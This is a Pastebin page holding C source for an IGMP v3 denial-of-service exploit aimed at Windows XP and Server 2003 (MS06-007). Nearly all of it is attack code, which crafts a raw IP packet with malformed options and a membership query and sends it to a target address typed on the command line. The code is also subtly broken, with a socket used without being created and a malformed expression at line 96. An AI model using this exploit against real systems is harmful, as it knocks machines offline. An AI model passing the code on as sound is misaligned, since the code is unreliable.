Advertisement
FlyFar

IGMP v3.0 DoS Exploit - The Byzantine Attack

Jul 22nd, 2023
1,085
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.58 KB | Cybersecurity | 0 0
  1. /*
  2. IGMP v3 DoS Exploit
  3.  
  4. ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
  5. ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx
  6.  
  7. by Alexey Sintsov (dookie@inbox.ru)
  8.  
  9. Req:
  10. Administrator rights on system
  11. Windows Firewall off (for sending RAW packets)
  12.  
  13. Affected Products:
  14. Microsoft Corporation Windows XP All
  15. Microsoft Corporation Windows Server 2003 All
  16. */
  17.  
  18.  
  19. #include <stdio.h>
  20. #include <sys/socket.h>
  21.  
  22. typedef struct iphdr
  23. {
  24. unsigned char verlen; // IP version & length
  25. unsigned char tos; // Type of service
  26. unsigned short total_len; // Total length of the packet
  27. unsigned short ident; // Unique identifier
  28. unsigned short frag_and_flags; // Flags
  29. unsigned char ttl; // Time to live
  30. unsigned char proto; // Protocol (TCP, UDP etc)
  31. unsigned short checksum; // IP checksum
  32. unsigned int sourceIP; // Source IP
  33. unsigned int destIP; // Destination IP
  34. unsigned short options[2];
  35.  
  36. } IPHEADER;
  37.  
  38. typedef struct igmphdr {
  39. unsigned char type;
  40. unsigned char code;
  41. unsigned short checksum;
  42. unsigned long group;
  43. unsigned char ResvSQVR;
  44. unsigned char QQIC;
  45. unsigned short num;
  46. unsigned long addes;
  47.  
  48. } IGMPHEADER;
  49.  
  50. USHORT checksum(USHORT *buffer, int size)
  51. {
  52. unsigned long cksum=0;
  53.  
  54. while (size > 1) {
  55. cksum += *buffer++;
  56. size -= sizeof(USHORT);
  57. }
  58.  
  59. if (size)
  60. cksum += *(UCHAR*)buffer;
  61.  
  62. cksum = (cksum >> 16) + (cksum & 0xffff);
  63. cksum += (cksum >>16);
  64.  
  65. return (USHORT)(~cksum);
  66. }
  67.  
  68. int sendIGMP(char* a, char* b)
  69. {
  70. unsigned int dst_addr, src_addr;
  71.  
  72. IPHEADER ipHeader;
  73. IGMPHEADER igmpHeader;
  74. dst_addr=inet_addr (b);
  75. src_addr=inet_addr (a);
  76.  
  77. char szSendBuf[60]={0};
  78. int rect;
  79.  
  80. SOCKET sock;
  81.  
  82. BOOL flag=TRUE;
  83. if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
  84. printf("Set options error");
  85. closesocket(sock);
  86. WSACleanup();
  87. return FALSE;
  88. }
  89.  
  90. SOCKADDR_IN ssin;
  91. memset(&ssin, 0, sizeof(ssin));
  92. ssin.sin_family=AF_INET;
  93. ssin.sin_port=htons(99);
  94. ssin.sin_addr.s_addr=dst_addr;
  95.  
  96. ipHeader.verlen=(4<<4 sizeof(ipHeader)/sizeof(unsigned long));
  97. ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));
  98.  
  99. ipHeader.ident=htons(0);
  100.  
  101. ipHeader.frag_and_flags=0;
  102.  
  103. ipHeader.ttl=128;
  104. ipHeader.proto=IPPROTO_IGMP;
  105.  
  106. ipHeader.checksum=0;
  107.  
  108. ipHeader.tos=0;
  109.  
  110. ipHeader.destIP=dst_addr;
  111. ipHeader.sourceIP=src_addr;
  112.  
  113. //Ip options
  114. ipHeader.options[0]=htons(0x0000); //bug is here =)
  115. ipHeader.options[1]=htons(0x0000);
  116.  
  117. igmpHeader.type=0x11; //v3 Membership Query
  118. igmpHeader.code=5;
  119. igmpHeader.num=htons(1);
  120. igmpHeader.ResvSQVR=0x0;
  121. igmpHeader.QQIC=0;
  122. igmpHeader.group=inet_addr("0.0.0.0");
  123. igmpHeader.addes=dst_addr;
  124.  
  125. igmpHeader.checksum=0;
  126.  
  127. memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));
  128.  
  129. igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader));
  130.  
  131. memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
  132. memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader));
  133. memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);
  134.  
  135. ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader)));
  136.  
  137. memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
  138.  
  139. rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
  140.  
  141. if (rect==SOCKET_ERROR) {
  142. printf("Send error: <%d>\n",WSAGetLastError());
  143. closesocket(sock);
  144. return 0;
  145. }
  146.  
  147. closesocket(sock);
  148.  
  149.  
  150. return 1;
  151. }
  152.  
  153. main(int argc, char **argv)
  154. {
  155. if(argc<2)
  156. {
  157. printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n");
  158. printf("Usage:\n");
  159. printf("c:\\igmps.exe <target ip> <source ip>\n\n");
  160. exit(0);
  161. }
  162.  
  163. sendIGMP(argv[2], argv[1]);
  164. return 0;
  165. }
Tags: Exploit DoS IMGP
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement